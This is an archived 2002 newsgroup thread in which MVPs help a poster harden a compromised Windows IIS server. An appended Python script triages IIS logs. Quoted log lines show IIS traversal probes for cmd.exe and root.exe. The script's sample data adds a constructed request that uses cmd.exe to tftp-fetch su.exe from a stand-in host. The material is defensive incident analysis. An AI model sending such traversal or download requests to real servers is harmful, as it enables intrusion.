Re: How do I block just one port from being listened to on my server

From: Karl Levinson [x y] mvp (levinson_k@excite.com)
Date: 12/18/02


From: "Karl Levinson [x y] mvp" <levinson_k@excite.com>
Date: Tue, 17 Dec 2002 22:03:13 -0500

Any chance you've got an easy to guess password on one of your accounts,
especially one of the accounts in the Administrators group? That could have
permitted access.

You should be able to find some way to block Netbios to and from the
internet [e.g. TCP and UDP ports 135 - 139 and 445] or disable Netbios or
Netbios over TCP/IP. I'm honestly not sure about file and print sharing
being required for IIS.

Searching www.google.com for RestrictAnonymous [or RestrictAnonymousSam for
Windows XP] can also help you a little bit to keep anonymous hackers from
getting a list of login IDs and share names from your computer.
RestrictAnonymous should be set to the highest setting which is 2 for
Windows 2000 and 1 for NT and XP, though in NT this setting is not 100%
secure and in Windows 2000 you have to use the vulnerable setting of 1 or
lower for domain controllers. Also the hardening checklists in the
previously mentioned URL:
http://securityadmin.info/faq.htm#harden

There ARE other theoretically vulnerable services, it's just that these are
the most common points of entry for script kiddies like this.

"George Hester" <hesterloli@hotmail.com> wrote in message
news:#d#MvNhpCHA.2008@TK2MSFTNGP12...
You may not believe but:

"..have the IIS FTP service running with the anonymous user having both read
and write access to a folder." No. And I sure wouldn't put a virtual FTP
folder on my Zip drive. There's no space on that; it's nearly full. Got
fuller when the hacker came by; he had about 1MB left. I kinda thought that
one was funny.

"or NetBIOS / Client for Microsoft Networks / File and Printer Sharing."
Yes I had NetBIOS over TCP/IP going. Necessary for my SQL Replication
Folder I believe. There are no shares other than the defaults and they are all
Read only. Also isn't Microsoft Networks / File and Printer Sharing
necessary when installing IIS? That's why I haven't removed it.

"In the IIS logs, you're looking for any line that has .EXE or % and that
also has a code 200 or 502 in it." Well I looked through ALL my logs;
W3SVC; FTPSVC; and SMTPSVC for .exe. They are all FrontPage Extension calls
in which case 200 thank goodness or like

2002-12-15 00:52:44 24.195.33.230 GET /scripts/root.exe 404 2 -

OR

Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0)
2002-12-15 01:21:18 24.114.139.244 GET /scripts/root.exe 404 2 -
2002-12-15 01:21:18 24.114.139.244 GET /MSADC/root.exe 404 2 -
2002-12-15 01:21:18 24.114.139.244 GET /c/winnt/system32/cmd.exe 404 3 -
2002-12-15 01:21:18 24.114.139.244 GET /d/winnt/system32/cmd.exe 404 3 -
2002-12-15 01:21:19 24.114.139.244 GET /scripts/..%5c../winnt/system32/cmd.exe 500 87 -

Actually I'm no expert as you may have surmised but I do keep my head above
water.

I know about the tftp.exe. That won't show in the logs will it? So with
that one I just said oh well, that may have happened. But I looked, believe
me, in any logs I have and I couldn't find the upload of that su.exe. And
why they sent it to a drive that had about 15MB of free space, when I could
tell that what they were trying to upload was over 40MB, was another
mystery to me. I attributed it to that being the only place they had
permissions to do it. It was FAT.

Well I'll be testing that Firewall out that you gave the link to. What you
said reassured me somewhat. I just don't want it blocking everything by
default and where I have to fight with it to determine what it's blocking
when things don't go as expected.

--
George Hester
__________________________________
"Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message
news:uRMBKqgpCHA.2456@TK2MSFTNGP12...
> Oops, if you had mentioned the root problem, we could have given you a
> more accurate answer immediately.  Blocking one port isn't the answer.
>
> IMHO you've got it backwards.  Blocking these with TCP/IP filtering or
> IPSec causes the worst headaches, because there are no logs to tell you
> what has gone wrong or how to fix it, or even whether or not the firewall
> is the cause.  Firewalls aren't 100% problem free, but nothing in life is,
> not even if you used just plain Windows with nothing else on it.
>
> Those people who complain about a firewall blocking their chat would have
> the same problem with TCP/IP filtering or IPsec, only worse because
> there's no log.  You can configure firewalls like the free www.sygate.com
> to block just one port, if you wish.
>
> The FTP attack you received had nothing to do with NTFS or FAT, these
> things can be written to NTFS as well.  Also, blocking just that one port
> isn't going to help you, because the hacker will just choose another port,
> there are 65,535 TCP ports to choose from.
>
> You probably either have the IIS FTP service running with the anonymous
> user having both read and write access to a folder, or more likely you
> have a running service that is vulnerable, probably either IIS web services
> or NetBIOS / Client for Microsoft Networks / File and Printer Sharing.  To
> fix this, you should probably secure your machine properly, using the
> instructions below.
>
> http://securityadmin.info/faq.htm#re-secure
> http://securityadmin.info/faq.htm#harden  [how to secure your computer,
> including patches and correct configuration]
>
> Before you do that, check your IIS logs [or your firewall logs, if you had
> any] to try to determine how the hack occurred.  In the IIS logs, you're
> looking for any line that has .EXE or % and that also has a code 200 or
> 502 in it.  There you may see exactly what commands the hackers used to do
> this.  Likely TFTP.EXE was one of the commands used.
>
> http://securityadmin.info/faq.htm#ftpfolder    [more info about one
> similar FTP exploit]
> http://securityadmin.info/faq.htm#hacked [how to find and try to remove
> signs of hacking]
> http://securityadmin.info/faq.htm#iislogs2
> http://securityadmin.info/faq.htm#iislogs
>
>
>
> "George Hester" <hesterloli@hotmail.com> wrote in message
> news:#SfAinepCHA.2620@TK2MSFTNGP10...
> Believe me firewalls are starting to look better to me.  Why am I averse
> to them?  Well because it is an added possible issue when things do not go
> as expected.  For example.  Have you ever heard of people who complain that
> they cannot receive or send files in MSN Messenger?  Well I sit here
> twiddling my thumbs while they turn this on, turn this off, until they come
> back and we try it again.  I just don't want to be hassled with that.
>
> And if I do know the IP that is doing this hacking how does that help
> anything?  These "people" are using proxies and use a different IP all the
> time.  Then I'm into the realm of blocking ranges of IPs.  Then I'm into
> the realm of blocking ALL IPs.  Can't have a public web site doing that.
>
> I had someone who ftp'd an executable to my Zip disk and somehow installed
> it.  It appeared in HKLM\Software.  It was ServU FTP Server. They then
> started uploading files to my Zip disk.  They didn't get very far because
> I heard my Zip disk whirring.  Zip was FAT and so I assume that's why they
> did it there.  It's the only non-NTFS File System on my System.
>
> They used port 968 and so I thought I could filter out all ports from
> accepting FTP except port 21.  But the IPSec seems to be more than I need
> and not sufficient for what I want.
>
> That's why a Firewall is starting to look necessary.
>
> --
> George Hester
> __________________________________
> "Karl Levinson [x y] mvp" <levinson_k@excite.com> wrote in message
> news:#pjlqodpCHA.1964@TK2MSFTNGP10...
> > I agree.  Additionally, you forgot to mention what version of Windows
> > you're running, which makes a big difference.  If you're running 2000 or
> > XP, you can use IPSec filtering.  I really don't know your aversion to
> > firewalls, there are several free ones including www.sygate.com  For my
> > money, blocking this with a firewall of some sort is often the best way
> > to do this, since you also get logging and alerting.  If someone hacks
> > into your system, you're going to want to see what their IP address was,
> > and without a firewall you won't have a clue who did it.  More info on
> > IPsec and other free and not free firewalls and packet filtering options:
> >
> > http://securityadmin.info/faq.htm#firewall  [including a section on
> > IPsec]
> > http://securityadmin.info/faq.htm#harden
> >
> > Note that just blocking a port from receiving new inbound connections
> > may not be enough to secure your computer, since outbound connections
> > can be used to steal data from your computer, remote control your
> > computer, etc.
> >
> > If you need to know what program you'd need to disable to stop a certain
> > port from listening, try using Vision from www.foundstone.com/knowledge
> >
> >
> >
> > "S. Pidgorny [MVP]" <slavickp@yahoo.com> wrote in message
> > news:#gOkaPapCHA.1644@TK2MSFTNGP10...
> > > George,
> > >
> > > Maybe you can just stop the service running on the port or unbind it
> > > from the NIC?
> > >
> > >
> > > --
> > > Svyatoslav Pidgorny, MS MVP, MCSE
> > > -= F1 is the key =-
> > >
> > > "George Hester" <hesterloli@hotmail.com> wrote in message
> > > news:OarZV4YpCHA.1876@TK2MSFTNGP10...
> > > without a Firewall.  I looked at TCP/IP filtering but that only gives
> > > us the option of blocking all ports except.  I would prefer to allow
> > > all ports except.  For me it is safer to do one thing at a time than
> > > hit the server over the head with a block all except.
> > >
> > > --
> > > George Hester
> > > __________________________________
> > >
> > >
> >
> >
>
>
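The log check Karl describes above (any line with .EXE or % in it that also carries a 200 or 502), run over the log lines George quoted, as an added example that is not part of the original thread. The `#Fields:` header is an assumption chosen to fit the eight-column lines in the post, and the 2002-12-16 line with the 192.0.2.x addresses is constructed here to show what a request that actually executed cmd.exe (and pulled a file with tftp) would look like; everything dated 2002-12-15 is copied from the post.

```python
"""Triage IIS W3C extended log lines the way the thread suggests: flag any
request whose URI contains '.exe' or a percent-encoded character AND that
returned status 200 or 502, and keep the failed probes in a separate list.

Added example, not code from the original post.  Assumes a #Fields: header
naming the columns (IIS 5 W3C style) with the query string as last column.
"""
import re
from typing import Dict, Iterable, List, Tuple
from urllib.parse import unquote

# Status codes the thread says indicate a request that actually ran.
SUSPECT_STATUS = {200, 502}
# ".EXE or %" anywhere in the request, case-insensitively.
SUSPECT_PATTERN = re.compile(r"\.exe|%", re.IGNORECASE)

# Constructed sample.  The #Fields header is an assumption; the 2002-12-15
# lines are the ones quoted in the post (the stray user-agent fragment is
# kept to show how a wrapped line is skipped); the 2002-12-16 line and the
# 192.0.2.x documentation addresses are invented for this example.
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem sc-status sc-win32-status cs-uri-query
2002-12-15 00:52:44 24.195.33.230 GET /scripts/root.exe 404 2 -
Mozilla/4.0+(compatible;+MSIE+6.0;+Windows+NT+5.0)
2002-12-15 01:21:18 24.114.139.244 GET /scripts/root.exe 404 2 -
2002-12-15 01:21:18 24.114.139.244 GET /MSADC/root.exe 404 2 -
2002-12-15 01:21:18 24.114.139.244 GET /c/winnt/system32/cmd.exe 404 3 -
2002-12-15 01:21:18 24.114.139.244 GET /d/winnt/system32/cmd.exe 404 3 -
2002-12-15 01:21:19 24.114.139.244 GET /scripts/..%5c../winnt/system32/cmd.exe 500 87 -
2002-12-16 03:10:02 192.0.2.77 GET /scripts/..%255c../winnt/system32/cmd.exe 200 0 /c+tftp+-i+192.0.2.10+GET+su.exe
"""


def parse_w3c(lines: Iterable[str]) -> List[Dict[str, str]]:
    """Map each data line onto the column names given by the #Fields directive."""
    fields: List[str] = []
    records: List[Dict[str, str]] = []
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if line.startswith("#"):
            continue  # #Software, #Version, #Date directives
        tokens = line.split()
        if not fields or len(tokens) != len(fields):
            continue  # wrapped or truncated line; cannot be mapped safely
        records.append(dict(zip(fields, tokens)))
    return records


def triage(lines: Iterable[str]) -> Tuple[List[Dict[str, object]], List[Dict[str, object]]]:
    """Return (hits, probes).  hits: .exe/% requests with status 200 or 502.
    probes: .exe/% requests that returned any other status (404, 500, ...)."""
    hits: List[Dict[str, object]] = []
    probes: List[Dict[str, object]] = []
    for rec in parse_w3c(lines):
        stem = rec.get("cs-uri-stem", "")
        query = rec.get("cs-uri-query", "-")
        if not SUSPECT_PATTERN.search(stem + " " + query):
            continue
        try:
            status = int(rec.get("sc-status", ""))
        except ValueError:
            continue
        summary: Dict[str, object] = {
            "when": f"{rec.get('date', '')} {rec.get('time', '')}",
            "c-ip": rec.get("c-ip", ""),
            "status": status,
            # Decode twice: "..%255c.." is a double-encoded backslash.
            "decoded": unquote(unquote(stem)),
            # IIS writes spaces in the query string as '+'.
            "command": query.replace("+", " "),
        }
        (hits if status in SUSPECT_STATUS else probes).append(summary)
    return hits, probes


if __name__ == "__main__":
    hits, probes = triage(SAMPLE_LOG.splitlines())
    print(f"{len(probes)} failed probe(s), {len(hits)} request(s) that executed:")
    for h in hits:
        print(f"  {h['when']} {h['c-ip']} {h['status']} {h['decoded']} {h['command']}")
```

Under the 200/502 rule the `..%5c..` request that returned 500 lands in the probe list rather than the hits, which is why the script keeps the probes as well: a server error on an encoded traversal is still worth a second look even though nothing was returned with 200.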


Relevant Pages

  • Re: Strange WAN Activity
    ... > firewall logs for a possible TCP FIN scan that keeps ... > company's intranet server IP and its port 80 across our ... > My firewall is a Sonicwall Pro 200 and I'm running W2K ... It's difficult to be sure without inspecting the web server for signs of ...
    (microsoft.public.win2000.security)
  • Re: Identifying Internet Attacks
    ... contain the hacker to a particular machine, leave the machine on the network ... Some firewall software such as ... open ports; however, this will not identify which program is using the port. ... firewall logs, the IIS web and ftp server logs and Windows security event ...
    (microsoft.public.inetserver.iis.security)
  • Re: false portscan alarm
    ... What is the reason of that treffic? ... and the browser and/or the "personal firewall" had decided to close those ... which each have a local source port above 1024 opened outgoing to port 80 ... I've had a dig through my own PIX logs, and while there is nothing for today ...
    (comp.security.firewalls)
  • Re: How do I block just one port from being listened to on my server
    ... Blocking one port isn't the answer. ... Blocking these with TCP/IP filtering or IPSec ... > Those people who complain about a firewall blocking their chat would have ...
    (microsoft.public.security)
  • Re: Inaccessible Port 80 - Pentest
    ... donot think a firewall would block be blocking. ... A mixture of layer 3 port filtering to restrict you to port 80 would seem to ... Internet, open one port on it and then block it from public use? ...
    (Pen-Test)